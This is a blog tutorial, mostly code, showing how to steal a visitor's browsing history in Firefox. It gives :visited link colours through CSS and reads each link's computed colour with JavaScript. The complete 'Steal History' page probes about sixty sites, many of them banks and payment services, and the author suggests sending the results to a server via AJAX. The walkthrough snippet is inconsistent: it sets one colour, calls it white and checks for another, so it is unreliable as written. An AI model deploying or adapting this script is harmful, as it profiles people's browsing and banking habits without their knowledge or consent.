Basic behaviour of any web browser will mark visited link using distinct color. CSS helps us to change this visited link color into any color to match web site theme.
Well, that behaviour will be an advantage for people who wants to steal your browser history. Yeah, you got that, by detecting link color. I will show you how to do that in Mozilla Firefox. This short of hack is taken from Jeremiah Grossman blog with some changes i made.
First, we need to mark visited link with our own distinct color, for that we’ll use CSS,
<style type="text/css">
a:visited { color: rgb(0,255,255) };
</style>
Now, any visited link will be marked in white.
Next, since this hack only works for mozila firefox, we need to detect user’s browser using this simple javascript,
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);
Create an array of popular websites that your visitor might have been visited as shown below. You can add more to the list if you like.
var websites = [ "http://www.ngoprekweb.com/", "http://digg.com/", "http://login.yahoo.com/", "http://mail.google.com/", "http://mail.yahoo.com/", "http://reddit.com/", "http://www.amazon.com/", "http://www.blogger.com/", "http://www.bloglines.com/", "http://www.google.com/", "http://www.microsoft.com/", ];
Finally, loop through our website list above and create a fake anchor element to detect whether it has color that match our visited link color before, then print it out if they match.
for (var i = 0; i < websites.length; i++) {
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];
document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
// check for visited
if (color == "rgb(255, 255, 255)") {
document.write('' + websites[i] + '<br />');
}
}
That’s it. Now you can show your user where he/she has been. Usually you also need to prevent multiple XSS loads. And with additional AJAX you can also send this information back to your server. Ooops.
You can try this out by clicking here. Don’t worry, i won’t save any of your browser history.
Now, this is my complete source,
<html>
<head>
<title>Steal History</title>
<style type="text/css">
a:visited { color: rgb(255,255,255) };
</style>
</head>
<body>
<script language="javascript">
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);
// popular websites. Lookup if user has visited any.
var websites = [
"http://www.ngoprekweb.com/",
"http://ajaxian.com/",
"http://digg.com/",
"http://english.aljazeera.net/HomePage",
"http://ha.ckers.org",
"http://ha.ckers.org/blog/",
"http://jeremiahgrossman.blogspot.com/",
"http://login.yahoo.com/",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://reddit.com/",
"http://seoblackhat.com",
"http://slashdot.org/",
"http://techfoolery.com/",
"http://weblogs.asp.net/jezell/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bloglines.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.cenzic.com",
"http://www.cgisecurity.com",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.expedia.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.jailbabes.com",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.ntobjectives.com",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.spidynamics.com",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.watchfire.com",
"http://www.webappsec.org",
"http://www.wellsfargo.com/",
"http://www.whitehatsec.com",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"http://seoblackhat.com/",
"http://www.alexa.com/",
"http://www.youtube.com/",
"https://banking.wellsfargo.com/",
"https://commerce.blackhat.com/",
"https://online.wellsfargo.com/",
];
/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
var d = document.createElement('div');
d.id = 'xss_flag';
document.body.appendChild(d);
var d = document.createElement('table');
d.border = 0;
d.cellpadding = 5;
d.cellspacing = 10;
d.width = '90%';
d.align = 'center';
d.id = 'data';
document.body.appendChild(d);
document.write('');
/* launch steal history */
if (is_mozilla) {
stealHistory();
}
}
function stealHistory() {
// loop through websites and check which ones have been visited
for (var i = 0; i < websites.length; i++) {
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];
document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
// check for visited
if (color == "rgb(255, 255, 255)") {
document.write('' + websites[i] + '<br />');
} // end visited check
} // end visited website loop
} // end stealHistory method
</script>
</body>
</html>
There’s a bigger (about 10,000 domains) implementation of this over at
http://linuxbox.co.uk/stealing-browser-history-with-javascipt-and-css.php